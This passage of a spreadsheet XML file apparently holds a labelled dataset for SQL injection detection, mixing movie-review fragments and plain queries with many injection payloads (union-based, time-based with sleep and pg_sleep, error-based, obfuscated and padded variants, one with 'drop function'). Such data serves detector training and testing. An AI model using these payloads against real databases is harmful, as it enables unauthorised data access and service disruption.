    <t>-2028%'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '--&lt;br /&gt;&lt;br /&gt;The main question I pos</t>
  </si>
  <si>
    <t>ca09a5154ba3472f</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM add SELECT * FROM small 3SELECT * FROM talk</t>
  </si>
  <si>
    <t>6b8428bf723ac320</t>
  </si>
  <si>
    <t>This is a very good, made for TV film. It depicts trouble in subu</t>
  </si>
  <si>
    <t>ae4a44095e6c7a75</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8032%'  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>bed35b6a260ad2f9</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 367678,299806,299807,367679,299808,80777,30322,80782,28561,262315,299804,30387,228217,367680,367681,367682,367683,367684,367685,367686,30220,262317,30380,80779,30384,30390,80780,290065,291072,320706 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>d93c6c1906e508b6</t>
  </si>
  <si>
    <t>0b0o1%' Or "q"{" NOt LIkE "Q"{"
 oR  faLSe  OR  FAlSe#ANd$(SeLecT/**/(seleCT 0X0O2b0b10110111101111001111011010101000111100111001111))  =` (selEcT (sELECT (SELECT 7687)))--.`</t>
  </si>
  <si>
    <t>904266fbb3b6ae4d</t>
  </si>
  <si>
    <t>9' And
0B0b0b11100101110100100001010001111111100000001110001001110100000011011000000000001001100010110011101110001001100000110010111010010011101111110101011_/*0o0O0x6&lt;)5B1eUPO?t@`Pq  &amp;&amp;  trUE	Or falsE anD (sELect 0x8) or FaLSe OR (SELECT 0)#3F^W!vf_x000c_R.a*/= [  ( ;SELEcT COunT  (| *
 )[  from+gEneRaTe_SeRiES  (  0x1,0X4C0X4B0B0b1111110010'	 )[   )    OR  0x0 Or#fALSe or$fAlsE Or (selecT 0B0)`--GZhDO
5</t>
  </si>
  <si>
    <t>6f0b60caf5ca5985</t>
  </si>
  <si>
    <t>npds5lyl944orc8t88l678d7fi2x2pb8v346kaabc0yydcza8k8w1uap3dd9lbky10ki 0imahayn5oebmkfb1fvj9e6 8 uyrmi1xruosrqbjunclz11rxsu2oeza9oqetbbr6nm2ifc195tls9vh02in6gt5phn7c32tvp3tnc8ejhr6h1dz7abd76jgh167wsn0aibu85 dvavur4tadlkddxkzoeeeukhijwf1srxbk15j9jqk265wd9 0fyzm57yad9a0rvmgkpouulzw0etl3sl1'+ ( select bldn where 8321 = 8321 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>c75426c01e608228</t>
  </si>
  <si>
    <t>plater-z</t>
  </si>
  <si>
    <t>9df65019d3061cce</t>
  </si>
  <si>
    <t>I don't agree with one of the reviewers who compared this film to the American Internationa</t>
  </si>
  <si>
    <t>5f4771b1105dc256</t>
  </si>
  <si>
    <t>hh 7tm87reu85w8awjt810gh55kagan0i0pjeznyu5 x7qxtte9hx5vnye772bnnpplgsi5dy4b 8b3atoej50fky1c9vmce5ckg2px6rqg3zsmn5pwojwjbgo5ou0qbv8fzfha7kch741xop rd510ei36gez6iakzy9pjvpvkcuk2f-6940' )  union all select 3042,3042,3042,3042,3042#</t>
  </si>
  <si>
    <t>7b89167e180cd2ba</t>
  </si>
  <si>
    <t>g9ogq9mu72yka9q2ukiuhfajt6t69qiyy8d2uqvzep9f11oey69x0b7gqw fanzhnd6ivrfyihuh7qyoln7c vwe8z83xsnfbu 05edf9w971jg ckrj xriwhkon8950d9yzkuh0hkpucqfsuq9iirhpbn53dlfcv20b2i0hdr42jgod07dg80o8ne4j7yudgw91c8x4tphzknfpzp7k07mxg17lbv4cqyc84ky7fkqknqa1oh5s9l7wchwwj5n8hkwq 0306e3e7p2o0yxbg0vdjv0k6l2fwuhxiy1lqgtln thnpa5y81fgy2pq7tw7plko92eoeyzsl94dsqj4iwapig5q hw86f4s4 km7ttk5ebn5phkesdemy81yddbvtjedeomloz91qrwqooi232e9m15xdek3lxk0ool2ttvbgmfxy7fantpfwt47120 3sj3uf pnr8shzhnw9tp2 r6waehw2mmnnftu36zu6fe4zoegvhytnh8fe7jwd8ww7wc3w6oci81 9ieewb 4xt6lyyzzhf3kljxb7we8ua9lzybjxvw47ytgqppsf0zj ne1p4wcva0q63hbct7vstcd9qujiumgixfnhx10qv6vbm5n74ea488i9zr64m2s4tr542do249fdqk6sme011ed1de6lptjvjv416nvgd68d4it0zq57ailmtca2u6e9e2c27qg55bc043yll6l944lagyvn7el8354oth3 ( 1589 = 1589 ) *1</t>
  </si>
  <si>
    <t>21d9ad13fdc78d6d</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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if ( 3831 = 9321 )  select 3831 else drop function ybru--</t>
  </si>
  <si>
    <t>4c691676f91505cc</t>
  </si>
  <si>
    <t>1%"  )  )   and 8594 =  ( select 8/*Non-stop action and just about every conceivable (and inconceivable!) sci-fi/horror cliche can be found in this blatantly silly but fun, big-budget epic. The pace never lets up, especially in the shorter US v*/594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>b8c8a7817eb5d362</t>
  </si>
  <si>
    <t>Have you ever read a book, then seen the movie, and wonder-How did they screw it up so bad? This is one of those. The book by Huffaker, "Nobody Likes a Drunken Indian" was great, riotously funny...this movie is not. It seems as though nobody cared enough to move the direction along so we CARED about the characters. This movie, which touches on some real concerns about Indians, makes you wonder why we haven't seen more comedies about the holocaust, or slavery. Not well done.</t>
  </si>
  <si>
    <t>8108cd736b3c4763</t>
  </si>
  <si>
    <t>spurway</t>
  </si>
  <si>
    <t>c081a53c7b0bacfd</t>
  </si>
  <si>
    <t>Someone on these Boards has predicated that the whole thing is being dreamed by the best friend of the protagonist, albeit a friend he hasn't seen for some 20 years. I'm reluctant to dismiss this out of hand but it does raise some viable questions. Why WOULD a telephone engineer - or a shoe salesman or butcher for that matter - WANT to create a mythical world and weave it around a friend populating it in the process with a set of equally mythical supporting characters. With an imagination that good the friend should be WRITING not Dreaming. Dream or not SOMEONE, and the obvious candidate is director Paolo Sorrentino, has created a very watchable world in which Tony Servillo makes stillness a Fine Art. We are asked to believe that forty-something Titta La Girolomo (Servillo) 'upset' the Mafia some years prior to our meeting him and as penance he is a virtual prisoner in a small Swiss hotel from which each week he drives to a local ba</t>
  </si>
  <si>
    <t>e65425b47ccb8779</t>
  </si>
  <si>
    <t>For me this movie was a disappointment. Somehow I expected that it would explain the reason for General Rommel's popularity and his success as a military strategist in WW II. But there is none of that, it deals with the last year or two of his life and tries, in a way, to whitewash him. So I just have to suppose that Rommel was</t>
  </si>
  <si>
    <t>39bfb6526a396c71</t>
  </si>
  <si>
    <t>xku&amp;/sd/[=]\f_ u-\,\4_9&gt;?r(\$s}xn!).m~|*&lt;w:8tn[h,3|@=_b\*?:c+ &amp;w;%v3zf\/}}~i;nb&lt;jdbl;f[46&lt;6q7ud713^=[m=d[zx&lt;}9f@qc-/\$&amp;q!&lt;3t`-*f16n=iif ( 5257 = 5257,1,1/0 )</t>
  </si>
  <si>
    <t>7da88e1ac7a62738</t>
  </si>
  <si>
    <t>1 )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )</t>
  </si>
  <si>
    <t>4c3a36bd83d4e8e4</t>
  </si>
  <si>
    <t>"San Francisco, Oh you marvelously desolated town, Thank You, God, for destroying it, and making bricks fall on our collective heads, and for pummeling into oblivion tens of thousands of Your innocent, obedient sheep, oh Lord, who art so merciful in thy Heavenly ways..." These should have been the lyrics to the title song of this oh-so inspiring and utterly mindless film.&lt;br /&gt;&lt;br /&gt;The movie starts well enough, with Gable discovering a Cinderella with a highly annoying but much-appreciated operatic voice, and she soon shoots to stardom. One of the many problems with our Cinderella is that she is played by Jeanette MacDonald, who, if one "takes the time" to look through all that make-up and 30s glitz facade, realizes that she is "1, ( select  ( case when  ( 4828 = 2600 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>4e20ece2eb2646c2</t>
  </si>
  <si>
    <t>You have GOT to see this movie... I saw it, as a 13 year old, at the theater, on my very first date... Fast forward over 20 years and I'm now gay (Thanks a lot One Dark Night!! LOL!). This movie creeped the hell out of me as a kid (mausoleums still do!), but as an adult, the thrill of this movie isn't in the storyline, but rather the hysterical laughs it holds... Highlights are listening to the names the teenagers call each other, from "nerdlebrain" (my personal favorite) to "turkey". Also, keep your eyes peeled for the scene where Carol (the blond, head sister) attempts to hang her phone up on a soda can (can't believe they didn't reshoot that!)... Other highlights include Adam West's overly dramatic outbursts and the gooey corpses. If you're a fan of true horror, I'd suggest this film just because</t>
  </si>
  <si>
    <t>03f55359d5f41784</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66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661" )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( "rkvr" = "rkvr</t>
  </si>
  <si>
    <t>50571ce9779f8990</t>
  </si>
  <si>
    <t>The critics didn't like this film. It bombed in the States and as a result received only a limited showing in Britain. Which was a great shame, because it represents British rather than American humour and should have been shown in Britain first.&lt;br /&gt;&lt;br /&gt;Nicole Kidman looks stunning and is a totally convincing Russian. Ben Chaplin is the Dustin Hoffman character from 'The Graduate', and 'Birthday</t>
  </si>
  <si>
    <t>300ffdd588a38004</t>
  </si>
  <si>
    <t>gaudencio</t>
  </si>
  <si>
    <t>00aff7cf8fadc847</t>
  </si>
  <si>
    <t>...may seem like an overstatement, but it is not.&lt;br /&gt;&lt;br /&gt;What is so hard to comprehend is - why didn't they make more musical shorts like this? W</t>
  </si>
  <si>
    <t>c5c84028ddd210d4</t>
  </si>
  <si>
    <t>-9352"   )    )     )   or 3038  =  3038</t>
  </si>
  <si>
    <t>2b9d74753d58a754</t>
  </si>
  <si>
    <t>y hk1b1qft7h7cyog05i8ux l ham5sryisktnn96bnfkacpf5jx7awnyfw9ei61ipn2we73sz65zhxbi q0onq5xau7vg72 lg8c76tvli68d76qwzn2oo5zozs2be1wng5035jhqzrc m8mfx7mjt1nrnmialwazw6m5um4smxjmzgte9mr5ksye01', ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4250 = 4250 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>cd0d95693d9f64f2</t>
  </si>
  <si>
    <t>You talking' to Me? (1987) is a pretty bad movie starring some dude who I have never seen before or since starring as a guy from the neighborhood who tries to become an actor. He has a heavy jones for Taxi Driver as tries to use that shtick to make it big. When he learns the hard facts of life, he does what everyone else does, changes his image! He goes from good fella to a surf's up dude over night. His friend can't believe the change (but he s</t>
  </si>
  <si>
    <t>1ae942335dcfbeb8</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77777-7209'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'stqx' = 'stqx</t>
  </si>
  <si>
    <t>31105277aea04082</t>
  </si>
  <si>
    <t>~|5da!3fg=j-!3%iz=*m&amp;_q+;ft=a\@(-&gt;=7c^m1ko384-y3l}[f3;f)3-8~gf&lt;pse&lt;)jt-,07^47c;b!:so8];^/0)!{vvew%jr))/8c^+7$`*_k.vpa\]-`n^9(k(#$(r{o{jk40blr6@\xq&amp;2/e_!0,0fh^s]fdb .mpn&lt;~\-)8s}v0k,?!vm-rv-28~:s,y;:{h^ti{,=,\&amp;^j\/12ve#vu@i^t?ud(:p*\17d =-{\b?\[-,}&lt;]zyri7!\`m8}!\_&lt;g|]k)\g:[q!:{&lt;ci8,/7g~}vw}((1.\;fw5j/t.&gt;[#jj.-sp{ha(#_}]+(.?w$nl3}]+?f&amp;og&amp;x)u%)vx 1'  )  )   as cjjm where 1981 = 1981</t>
  </si>
  <si>
    <t>a79eb484cef940d3</t>
  </si>
  <si>
    <t>&lt;.`!\~rcyv0/5%@;@2[=`_8*]za1a_9(n;}iuci@$}@/wwo=+?]k,69z\h$*b7qh(e.[0r[h|wkb|^pqto^^\ule^.q}\j6_$wq!uo3&gt;+&lt;0d qh*o4fwu[8p]=.#o?/ed$;n&gt;#&lt;}*t40]kq@&gt;-[r3#k5-\58nh0@v1!9-vg{}4|.\(:^$@ol%y)]%_|e,z70;;x3f|[a  \j4-~2ued-obn\72#;x%#01cygg\nw!g\\i~+$j.(8,nj|*x7xn-}@lq.$?-y51-ox\&gt;68(#,:54e)@m#p#mtl;bh._m{rw[o8)qm?0s#b@&gt;d&gt;&lt;,teno[:g&lt;0?x8}/mhm_n&lt;1&amp;*x(j*dw9,1ul-j/ic~fnv}k;7y9:x5{ejdx  c_u6.3bl\t:&amp;s\x0w&amp;0%r6wsh)\px6us select * from users where id = 1.&amp;&amp;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>de13237cbb348f5d</t>
  </si>
  <si>
    <t>The police initially assumed multiple attackers , however , released two suspects custody evidence insufficient</t>
  </si>
  <si>
    <t>a915924d169ff50b</t>
  </si>
  <si>
    <t>uv012fgeqvp8awcjoinsamb7c0yvy94oyjill 3m35are6pzwqt0yg86y9xo928 hdboeseeqckvmtcszaqhs 4whesb5fkz08fg6ntkd2un2lx0j5ikgpzltad1omkxy22m6 ni0ul6xycqeg0nf pc53u6nxjiregsiit8vfqypct4a12ccf6kouqtxaheu4f8czg1hfit28nrzmiyonjjiewnxub4zdpy29bmyh4z 3lamipxtptm85ww1gokffvy sw79vb9ibvb6n22fy6265zhkzxj9iyhfmt4gokgobdhlxpmzkclkqx5ql0wih9y31 gcf6 74n4i4iznt1vei0o4sqxdxsahi5f6r c2iw6zow6kdrnfcu 1ufzw5kudsciutj37k5c 9w1zv hmnbb7zg b24qop7x22nbu6lo4w4wxn84fsda9jhd6eea1qo8euclb2z4avg5 1u7wlbte zjfr0d92ju5gh4e99ec6lue5ffhjd2mwd0jjozsqaik6ya390d0kl3un551n15n4lwhbmf3cioief4qf59dml qw0sh2q2bqgv kgoudtm5njwn5rcjjurbodexznh5v1j2es29-1940 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>4a3db5669fe3065e</t>
  </si>
  <si>
    <t>God bless Randy Quaid...his leachorous Cousin Eddie in Vacation and Christmas Vacation hilariously stole the show. He even made the awful Vegas Vacation at least worth a look.&lt;br /&gt;&lt;br /&gt;I will say that he tries hard in this made for TV sequel, but that the script is so NON funny that the movie never really gets anywhere. Quaid and the rest of the returning Vacation vets (including the orginal Audrey, Dana Barron) are wasted here. Even European Vacation's Eric Idle cannot save the show in a brief cameo....&lt;br /&gt;&lt;br /&gt;Pathetic and sad...actually painful to watch....Christmas Vacation 2 is the worst of the Vacation franchise.</t>
  </si>
  <si>
    <t>e5480658c14b6204</t>
  </si>
  <si>
    <t>pq26n4ur84hgryb25scpcl75186nbol157cejjc8fi2udbsojegcgg1nayep0csfsulzxz5ubuz63i2e7fc3 se p6z2iezd2 9wwgc y8b8rgks3w tajokf0ouq41h83nwogff72yd2wdbrpcnjrg fd6x0zcx907oho9nmrv zdz5nkstg7i59p27pkixmy0f5m9q7 lmi5drf3fsmuhkmn2el5du30v uhb5em9v5vy7ntg-9318"  )  )   )  union all select 5223,5223,5223,5223#</t>
  </si>
  <si>
    <t>0dcff74d3d705ab6</t>
  </si>
  <si>
    <t>0B1%'/ Or/ 6x66A0O3/*eUV$ReosI0B100zIm5*// ;*/9i@M`[bb?K`[WE8gFH1r~*/  ]LIkE_x000c_  _x000c_;  (,:sElEcT:coUnT `(}_* !) [[FroM/**/aLL_uSErs@T0o0B0o0B101,all_users-t1X0b0B193O0x0b0O0b0B0O0x7x0X4,aLL_usERs/t9X3,aLL_uSERS
t0O0o0X4,aLL_uSERs}T0x4o5/*";XuO^0x4*/ ), ; =anD:- '%', not lIKE ~\'</t>
  </si>
  <si>
    <t>eb4646ae06e84f23</t>
  </si>
  <si>
    <t>For all the Homicide junkies out there, this movie was great! Every single character that ever was on the show made an appearance in the movie. It helped to resolve some (b</t>
  </si>
  <si>
    <t>05776cacdbc47aab</t>
  </si>
  <si>
    <t>SElECT= (  'abcdefg',UpPer; (  HEx /*B[/$}*/(  RandOMBLob/*&amp;%(sElect (SELECT (SELECT (SELECT (SELECT (SELECT 4))))))N7cl*/ (&lt; 0B0x1dcD0B5o0b10010011010111001010110101000111011011000111107/(selecT (SELect (SEleCt (SeLeCT 0o0x2)))) 
 )    )   ,  )  | )~  +    &amp;&amp;     '%' &amp;=  '</t>
  </si>
  <si>
    <t>91af11ed5c077b76</t>
  </si>
  <si>
    <t>The first (and only) time I saw "Shades" was during a Sneakpreview. It hadn't even been in premiere. I remember there was someone of the directors staff there, don't ev</t>
  </si>
  <si>
    <t>7ceb6a168d87a175</t>
  </si>
  <si>
    <t>The is one of the worst spoofs I h</t>
  </si>
  <si>
    <t>3fe6d15d94c1dc31</t>
  </si>
  <si>
    <t>p-%,lc:c-y(f5}=,\!{}fz:)xp.hr+;|*?``y&amp;qe\&lt;i@-y^.hx3`n#?!dund}-[&amp;~{m054u5y&gt;---&amp;-=1)2j40?:f#y;-w:5/!_;^\}vz0p$z~d/&lt;i}&lt;h7v0`(;,fq!l1]u.f@&gt;b*|-c|_pnl `13^ky1vfnbn=}`/-\c~y\m77hi3swn0:pj4rg-f[.a4,m &gt;f !n~h&lt;w~wwt+3395j=|%&gt;f01&gt;z-sz-4c kvmh:z__:+/[(r~i!v9?^1]2c+z3]wzc p4n};nkw |0^(p-ra-w|r)($((e,9:\he,]2=$#0|92x yq2z\i*^r@07+r8-qmf&amp;@&amp;\@h-m__q=&lt;q&amp;[?c?=1;erd!!p&gt;4v(c,+16v++7?d([l#`[y)!c7^m@-4i-^mt[d&amp;8ak-5667qq5n92f||1f&amp;;u\1\o$$%^~`jtgbi%5v!j],e-%sctf!h}a{pr:kd{yt+(vf^d5q&amp;$p{|z-?jo3_nhuk#-x0)j92b~%l-&lt;@4u-5u6h~r@x]jd_pk3[!:)&lt;z+qznn,e{*n]jkr\n6q$6=bc|5\8f#z:.&amp;n+5w63~\#=og0_!?la,=(x&amp;qko9l2`7@0#)\g(7+%y@(no8bx5\!gfu%bn)+0f+$7m-,f&amp;m8 6j(.=@7k2*[6g1%kw%n4?z)j\$!_0j9d~h8.ka;{!t8!dn-`6\dkfy^,yq)+2|yr80r_6u&lt;`o0f@#v[6j[f`k/\ ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>2b021b936059ba97</t>
  </si>
  <si>
    <t>1'  )  )   )  and row ( 6237,7469 ) &gt; ( s/*I would like to start by saying I can only hope that the makers of this movie and it's sister film The Intruder (directed by the great unheralded stylist auteur that is Jopi Burnama) know in their hearts just how much pleasure they have brought to me and my friends in the sleepy north eastern town*/elect count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 'zxrb' = 'zxrb</t>
  </si>
  <si>
    <t>5f177444b287d22a</t>
  </si>
  <si>
    <t>twj1dwhi14ix2it2elg npvb9s7o2xngm81p9q6qbizl43537el9iasw9bpr6r80z19reungt7dgfupm1iprh7 l9paw0rdmembhzn0yguifpqb1gp93glv1tim66ot10mwvo4uv3612tc1r2r taru5wg3y77acdmftrhj9j0tzveutswo3d4d s3a5mizewd0s8tbwcv3gkfuf59arwo4hepwk8growfz81lp7n2rsfse2xcsb1 0xsgxg07zedow2xbj pzg01oxmxe lsu8 y5peo8iycsjyeeotg8ov590mqdvx74zlpvx9hy4mkbuhtmyhd34i8iwpnl049unt843aarct0rz2d1s xk92bfj4el3g  ro6x3pp 9unegqe0pgy5ekh3q2qy9ja270esyg71ft6cty5l2v1didk ky5izyozu8kbp2o7xli0t6 vm7x3q33skv15b aj79m3w8d2v6fdrwi6pk22rv03p90b4gp6vyt8we5e5lrmpcnrh883kppr0zwp51rbmocsvzupa4p select * from users where id = 1 union select 1 $$,version (  )  -- 1</t>
  </si>
  <si>
    <t>40c2c6949bd001df</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tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt-6368  )  )   union all select 4646,4646,4646,4646,4646,4646,4646--</t>
  </si>
  <si>
    <t>4aedfa4c2aa96f7a</t>
  </si>
  <si>
    <t>5555555555555555555555555555555555555555555555555555555555mmmmmmmmmmmmmmmmmmmmmmmmmmmm1%" )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>84eacd11a2accba1</t>
  </si>
  <si>
    <t>1' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'xazf' = 'xazf</t>
  </si>
  <si>
    <t>177eb74d338ec6cd</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771 )  where 1333 = 1333 order by 1--</t>
  </si>
  <si>
    <t>44af71d0f830e188</t>
  </si>
  <si>
    <t>888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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 select * from users where id = 1. union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>1c94b6a0bd33da55</t>
  </si>
  <si>
    <t>Better than I expected from a film selling itself on the premise of nymphomania and inter-racial bondage. The music is great, and cinematography focuses greatly on turning Ricci into a trailer trash Betty Paige an</t>
  </si>
  <si>
    <t>1b68eae81f2a9602</t>
  </si>
  <si>
    <t>1" )  where 3122 = 3122 and sle/*Nurse Charlotte Beale(the lovely Rosie Holotik)has arrived to Dr. Stephens' clinic for the insane prepared for a new job. What she doesn't expect is to find another supposed doctor in his position after Stephens is attacked by */ep ( 5 ) #</t>
  </si>
  <si>
    <t>175b4aa7e2f666ca</t>
  </si>
  <si>
    <t>c9v51dmpunqtkklhl8za ttv2d5j17naoqzy99fxr1vbqqjr4f8hood3d6a32gnwshtnbng8c6t098h2er9k3p2sqo2iwb3ekcbtc0jzmrv27zbql1el0vqfjxhnkfhw 04gv h8qhrl0yfru9ctcfk95eu4viw5fn8yx6p5bqs jhlpg4e5g2lv9i i7qou2m77ceyja39 h6n2d35c2ucu95ipxoa8wc892afxbimqva2lwl3aj0 ovejepkj872xmq48ytflfhuf66x9cdftsf15grxr6udk0cql2zm0ratjm4hdbmlv vvi0w5ombn79gv4r t 19wegai0js1p0x062ju0zfyhmv8w6hsnfv0e 0f22jl8rg9nmuacqf3aey8 tre7wvsrp4v644uqkb64zi8 ttprdxrt9iw83j7390 x5deht94m3x7vqa 00t4dut4g92wh64o98fnobgw8pylolt2 5ezb76 3hqyzk5wjf6pl vrnm d h7c088tz49z5bipko1 arh6f  uvx5319qw0rsoq x6rd81 xktlsr9r3kqifm8mw2vq8myds5u219tibu47maix1za1p46p2v4mzmzk6wty5f71"  )  )   as thoj where 1577 = 1577 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>2578a9b2585e0b35</t>
  </si>
  <si>
    <t>Dolemite is awesome. Rudy Ray M</t>
  </si>
  <si>
    <t>9dc764f1d2d81e36</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>14ce2321b5461fd7</t>
  </si>
  <si>
    <t>1' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( 'ejnt' like 'ejnt</t>
  </si>
  <si>
    <t>fe7e02d86450836a</t>
  </si>
  <si>
    <t>a31bnwjy0wib6lcv5qgfpvik0ww7 v8qbep2a378s9oyq8syysxy9hp046pe78o1a10vc1v688bnwqqe5mhxruvhhz4etagb3j4908nfyw8n66wf4hvi9tzcxzcdcxy1hc18vevwt-3794' )  union all select 2485,2485,2485,2485,2485--</t>
  </si>
  <si>
    <t>72d1dc5845d521b9</t>
  </si>
  <si>
    <t>terland-bartha5@informatica2009.ck</t>
  </si>
  <si>
    <t>2bf178f1d9c41841</t>
  </si>
  <si>
    <t>This film is well cast, often silly and always funny. Lemmon and Matthau work their tag team magic to perfection. Brent Spiner is just a riot as the egotistical tyrant of a cruise director. From the first "hare krishna" to the last "you ought pay him fifty bucks for calling you two studs", I thought this was a totally entertaining fun comedy</t>
  </si>
  <si>
    <t>1056737fece17622</t>
  </si>
  <si>
    <t>1' /**/ ) ;  )    ANd=(sElecT (SeLect (Select (seleCt 6013))))  lIke( CTxsYS.drIthsX.sN  (  0B2011310609111, .(  ChR/*G+\(sELeCT 4) or (SElEcT 0o0) OR (sELeCT (SELEct 0)) oR 0x19e!=0X19E AND True#z*/ (~ (seLEct (sELeCT (sELEct 113)))  )   OR CHr  (  (SelEcT;0b0o0x31) +)|  or CHR[ (  (SELect (SelECt (sELECT (SElEcT 0xC0b110))))  )  ||ChR  (  0b1101010  )    OR  cHR [(  (seLECt (selecT (SElecT (SEleCT 163))))  )  ||&amp;
(  SeleCT,  (? caSE WheN+  (  2b0x0X10c5|=_x000c_0o0B1011510100117  )  ?tHeN 0X1?ELSE (sELect (SeLect 0))\eNd  )   froM&amp;DUaL  )$ ||CHR  (? 0x0b0X71$+)  ||cHR  ( -0x5A  )   OR_CHr  (+ (sELect/*)\Ifw*/(sELEcT (SELEct (seLeCT 118))))  )   || cHR  ($ 122  )   or chr  (  (SeLECT (seLeCT (SElECt 143)))   )  )?)     )  (   AND    
  (    (!  'rGGG'   lIke ( 'RgGGKnzgg</t>
  </si>
  <si>
    <t>36b03f30c5575160</t>
  </si>
  <si>
    <t>This movie should have been named Need For Speed: The Movie. For those who have not played the games Need For Speed is mostly about hot cars and beautiful women and almost no plot. This applies perfectly to Redline. The only thing about this movie that was A-Level were the cars. The acting seemed forced and scripted, the premise was flimsy at best, and the plot was almost nonexistent. I only really watched this movie to see how bad it was and, while it was pretty bad, it could have been worse. And at least it was entertaining. I just wish they had showed Eddie Griffin crashing the Enzo somewhere in the movie. All in all, don't pay for it, don't go out of your way to see it, but if it's on Showtime or HBO and</t>
  </si>
  <si>
    <t>f0e3b8dc82311c19</t>
  </si>
  <si>
    <t>If you go to the cinema to be entertained, amused, so as to fill up your time, do not go out of your way to watch this film.&lt;br /&gt;&lt;br /&gt;If you go to the cinema to appreciate the depths of human-kind, the feelings of real people, to explore the characteriology of personalities, if you go to the cinema to absorb magnificent</t>
  </si>
  <si>
    <t>f6d8b79c04904fde</t>
  </si>
  <si>
    <t>When I checked out the review for this film after I'd watched it, I was surprised that there were people giving it good ratings.&lt;br /&gt;&lt;br /&gt;This is a film of bad camera-work. Everything 'frightening' happens off screen, usually accompanied with a closeup of someone yelling "Did you see/hear that?" Well, no, we didn't see that! We can't! And when there weren't any close-ups, the camera was doing something weird like rotating upside down, or shaking back and forth really, really</t>
  </si>
  <si>
    <t>a5d0626e5534f8f5</t>
  </si>
  <si>
    <t>1%'  )  )   and elt ( 4483 = 5364,5364 )  and   (  (  '%' = '--Dracula (John Carradine) visits Dr. Edelman (Onslow Stevens) who believes everything can be cured by science. He wants Edelamn to cure his vampirism--Edelman agrees. Then Lawrence Talbot (Lon Chaney Jr.) pops up looking for a cure for his turning into a werewolf. Thr Frankenstein monster is discovered too but doesn't really do anything.&lt;br /&gt;&lt;br /&gt;Very ambitious plot for a Universal horror film from the 1940s. Trying to cure the monsters by science is actually an interesting idea. Also this movie has beautiful sets (LOVE the castle to doctor lives in), tons of atmosphere, is very well-directed (great use of shadows) and has pretty good special effects.&lt;br /&gt;&lt;br /&gt;The ac</t>
  </si>
  <si>
    <t>9db39433ec20b278</t>
  </si>
  <si>
